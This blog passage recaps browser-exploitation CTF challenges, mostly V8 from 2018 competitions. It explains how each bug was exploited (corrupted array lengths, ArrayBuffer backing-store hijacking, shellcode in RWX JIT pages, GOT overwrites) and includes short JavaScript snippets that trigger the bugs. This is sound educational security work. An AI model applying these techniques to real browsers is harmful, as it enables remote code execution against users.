Parting Thoughts

Over the past several years, CTFs have become increasingly involved and reflective of real world vulnerability research. CTF is a common route for new talent to break into the industry, and for professionals to use their skills in competition. Challenges are often written based on inspiration from bugs the authors have seen elsewhere, and Super Hexagon definitely felt that way to me.

HITCON is always one of the top CTFs of the year, and 2018 did not disappoint. The organizers had forgone having a final that year and so the challenges during the online event were all difficult and novel. I would consider it one of my favorite events of the year, and based on recent updates to their website, it appears that HITCON 2019 will be taking place. I’d encourage anyone who has made it this far to participate.

Until then, you can find my full solution scripts and notes for Super Hexagon on my Github here.

Other Writeups

Super Hexagon: A Journey from EL0 to S-EL3, by Grant Hernandez (Kernel Sanders)

PPP’s writeup

Balsn’s writeup

advent-browserpwn 2018

2019-02-13T07:31:06+00:00

Last December (2018), I created an advent calendar on the Japanese site adventar.org after seeing some Japanese CTFers creating a PWN-focused calendar there.

You can find it here: https://adventar.org/calendars/3435

The general theme of my calendar was focused around solving browser pwnables from recent CTFs, with a strong focus on V8. I tried to arrange the challenges in such a way that the learning curve would be reasonable and to give myself enough time to solve them. Things got even better when 35C3CTF, which took place right near the end of December, featured a fun V8 challenge that I added to the list. Overall, I finished the last challenge sometime around the last week of January 2019.

Below I’ll briefly discuss each problem I completed. Many of these have been discussed in depth elsewhere on the internet, so I’ll try to keep my contributions short and focus on general thoughts. I freely admit this is not a tutorial post, but more of a summary of my calendar.

Warning, spoilers follow. If you are just interested in solve scripts, check the bottom of the post.

“Blazefox” (BlazeCTF 2018)

BlazeFox was the sole non-V8 challenge on this list. It involved a straightforward method added onto the Array class that would directly set the underlying length field to 420. Since obtaining corrupted length fields on an array is sort of the end state that browser exploits coalesce to, it was a great starting point for me to understand the underlying fundamentals (properties? elements? inline-elements? maps? backing stores?). Overcl0k just published a great blogpost on this challenge, so I’ll not discuss it too much here.

My strategy for browser bugs of this category (those that lead to a corrupted length field) is to use the corrupted array to directly manipulate an adjacent victim ArrayBuffer. ArrayBuffer objects usually consist of few elements beyond a “backing store” pointer, representing the pointer to a raw data buffer, and a length field. By manipulating the backing store, we obtain an arbitrary read/write memory primitive from our weaker relative read/write. From there, I used the same method as describe in this phoenhex article to overwrite a GOT entry in libxul.

V8 Challenge (CSAW 2018 Finals)

Unlike Blazefox, this challenge doesn’t directly hand us a bug. Rather, it defines a new interpreter method Array.prototype.replaceIf(index, callbackfn, replacement) as a builtin, giving us a chance to do some small-scale bughunting. In this case, the bug is related to proxies and a lack of state-flushing after allowing Javascript execution to occur. Javascript proxies are objects that let us override normal object behavior for common operations (getter/setter/method calls), and can be a common source of bugs for code expecting default behavior. We can define a handler to override certain property accessors to fake out the length field when it is requested.

var handler = {
    get: function(obj, prop) {
        if (prop == 'length')
            return 0x1337;
        else
            return obj[prop];
    }
};

new Proxy(new Array(0x8), handler).replaceIf(idx, function(elem) {
        return (idx == 0x33); // index we want to overwrite
    }, 0x13370000);

Now, we can use the replaceIf function to read and write OOB from our array. At this point, the next few exploit steps are similar to Blazefox: find our victim ArrayBuffer, grab its backing store, construct our r64()/w64() functions, etc. How to get PC? As of 2018, V8 now ships without RWX pages enabled by default in the renderer process. However, this challenge has re-disabled that feature for us. So we can walk class/structure offsets to reach the RWX page corresponding to a JSFunction and simply write our shellcode there.

“Roll a d8” (PlaidCTF 2018)

This challenge was the first n-day challenge of the calendar, targeting crbug 821137. Players were given just a V8 version and the following regression test:

// Copyright 2018 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Tests that creating an iterator that shrinks the array populated by
// Array.from does not lead to out of bounds writes.
let oobArray = [];
let maxSize = 1028 * 8;
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
  {
    counter : 0,
    next() {
      let result = this.counter++;
      if (this.counter > maxSize) {
        oobArray.length = 0;
        return {done: true};
      } else {
        return {value: result, done: false};
      }
    }
  }
) });
assertEquals(oobArray.length, maxSize);
// iterator reset the length to 0 just before returning done, so this will crash
// if the backing store was not resized correctly.
oobArray[oobArray.length - 1] = 0x41414141;

Thanks to the comments, the bug is pretty obvious. Shrinking the array you are iterating over, in the iterator callback function, incorrectly changes the array length without resizing the backing store. There really wasn’t a lot different happening here than before - we can see the pattern already. Corrupt array length -> overwrite victim -> clobber function code pointer -> shellcode. Besides implementing the weaponization again, the main difference was getting used to the Chromium project’s bug-reporting and regression system.

“V9” (34C3CTF)

V9 represented a completely different direction from the previous browser challenges. It required an understanding of Chrome’s Turbofan JIT subsystem. This was an interesting opportunity to approach JIT bugs because the provided patchfile was quite small:

@@ -26,6 +26,7 @@ Reduction RedundancyElimination::Reduce(Node* node) {

@@ -167,6 +168,15 @@ bool CheckSubsumes(Node const* a, Node const* b) {
           }
           break;
         }
+        case IrOpcode::kCheckMaps: {
+            // CheckMaps are compatible if the first checks a subset of the second.
+            ZoneHandleSet<Map> const& a_maps = CheckMapsParametersOf(a->op()).maps();
+            ZoneHandleSet<Map> const& b_maps = CheckMapsParametersOf(b->op()).maps();
+            if (!b_maps.contains(a_maps)) {
+                return false;
+            }
+            break;
+        }

The challenge adds a new opcode to the list of those removed by RedundancyElimination, which is a JIT pass responsible for removing redundant nodes in the sea-of-nodes representation. The pass itself is invoked during the “early optimization” and “load elimination” phases of the Turbofan pipeline. We can visualize all Turbofan passes and node graphs using the Turbolizer tool, also available in V8’s git repo. In this case, the added opcode removes a CheckMaps node if one child’s map is strictly a subset of the second. You can imagine that situation occurring with code like this:

var x = [1.1, 2.2, 3.3, 4.4];
x[0] = 5.5; // [A]
console.log(x);
x[1] = 6.6; // [B]

At [A] and [B], a CheckMaps is emitted to ensure that the console.log(x) call has not transitioned x’s underlying element map. Such a node might be emitted as a protection against an object changing from PACKED_DOUBLE_ELEMENTS to DICTIONARY_MODE, for example. However, the Reduce() is incorrect because it does not check exactly that; x will transition and the emitted fast access code will be incorrect. The following code will transition an Array in exactly that way (packed -> dictionary) resulting in OOB access:

var x = [1.1, 1.1, 1.1, 1.1]; // declare a PACKED_DOUBLE_ELEMENTS
x[3] = 1.1; // inlined StoreElement, protected by CheckMaps

x.len = 0x7f0000; // transition to DICTIONARY_MODE

// At this point, x is of type DICTIONARY_ELEMENTS, but the JIT thinks it is PACKED
// The following inlined StoreElement will incorrectly offset from the array, rather than
// resolving the looking with the Elements pointer
x[20] = val;

“krautflare” (35C3CTF)

Much has been written about krautflare elsewhere online, including some excellent writeups (here and here). The key problem in this challenge is how to delay optimization in V8 until the ConstantFoldingReducer will no longer be invoked. Doing so prevents the typing bug, which could be induced to appear in an early typing stage, from being optimized out before it can be used to generate buggy code. In theory, the answer is straightforward - prevent V8 from performing type analysis until a later pass has removed some intermediate construct. One such example, which I and others used, involves forcing a delay until escape analysis:

function diagonal(a) {
    return abs({x:a, y:a});
}

// After Escape Analysis...

function diagonal(a) {
    return Math.sqrt(a*a + a*a);
}

I didn’t solve this challenge during the competition. I knew I had to wait until escape analysis to prevent early optimization, but was having trouble triggering it during the CTF. In the end, through a combination of child functions and hiding arguments I got it to work - as a OOB write. For some reason, Turbofan was not removing the CheckBounds on my OOB read attempts, which I think may be related to a Load node not being inlined, whereas the StoreElement node was lowered to remove its internal bounds check.

One interesting thing to note is that constructions involving escaping object properties, like the following:

function x() {
    return {a: 1}.a;
}
var y = x();

…seem to be optimized during the “load elimination” stage if possible, right before “escape analysis”. Sufficient complexity or child functions will prevent that from happening. This means that contrary to the name of the phase, simple objects will undergo escape analysis optimization prior to the formal “escape analysis phase.” It’s also possible to prevent the “load elimination” phase from optimizing it by including a large number of class members (see kMaxTrackedFields, currently 32), which _tsuro utilized in his reference solution.

“Just-in-time” (GoogleCTF Finals 2018)

This challenge adds a small Reducer to the V8 pipeline, which is basically just a phase (like “dead code elimination”, or “load elimination” as we discussed above). The added buggy DuplicateAdditionReducer combines JSNumber operations with constant double values at JIT compile time. For example, expressions of the form 1.1 + (2.2 + 3.3) would be converted to 1.1 + 5.5. The combination was done by pulling out the underlying double value and adding them with C++ float semantics. Unfortunately, that doesn’t quite match JSNumber addition semantics. While most people online abused the fact that Number.MAX-SAFE_INTEGER + 1 === Number.MAX-SAFE_INTEGER + 2, solving krautflare right before this made me think of

-Infinity + Number.MAX_VALUE + Number.MAX_VALUE == -Infinity

which is correct. However, the DuplicateAdditionReducer combines the two into

-Infinity + Infinity == NaN

which creates an observable typing bug. Afterwards, the problem actually reduces to that of krautflare, just substituting Object.is(..., -0) with Object.is(..., NaN). In fact, my final buggy JITted function for this challenge is almost identical to my krautflare solution.

If you’re interested in reading more about this challenge, __x86 has a great post that dives deep into it here.

“Mr. Mojo Rising” (GoogleCTF Finals 2018)

After completing a series of renderer bugs, it seemed applicable to throw in at least one SBX challenge. This was a P0-discovered nday bug that allowed for relative r/w off of a Mojo datapipe, which are basically mmap’d shm regions in memory. The Mojo documentation is pretty sparse and I ended up having to spend a decent amount of time fiddling with ServiceWorkers to get things to play nice with headless chrome. Eventually, I was able to trigger the primitives and write straightline exploit code with await. Ultimately, this was my most brittle exploit - it’s heavily offset + allocation order dependent. I abuse the predictable ordering of mmap allocations to overwrite a function in libc’s GOT to point to the magic gadget, a classic CTF trick.

All that work for this, an asciinema of it landing.

Parting Thoughts

I had a lot of fun completing the above challenges and will definitely continue working on browser exploitation. While I’m not sure how I feel about the recent trend of “weaponize-nday-as-a-challenge” in CTF, the problems present easy environments to focus on weaponizing bugs in a straightforward way with more focus on the browser internals than any environment factors that might complicate things. At the very least, it’s definitely good practice!

You can find all my solution scripts (as well as collected challenge readmes+patchfiles) here.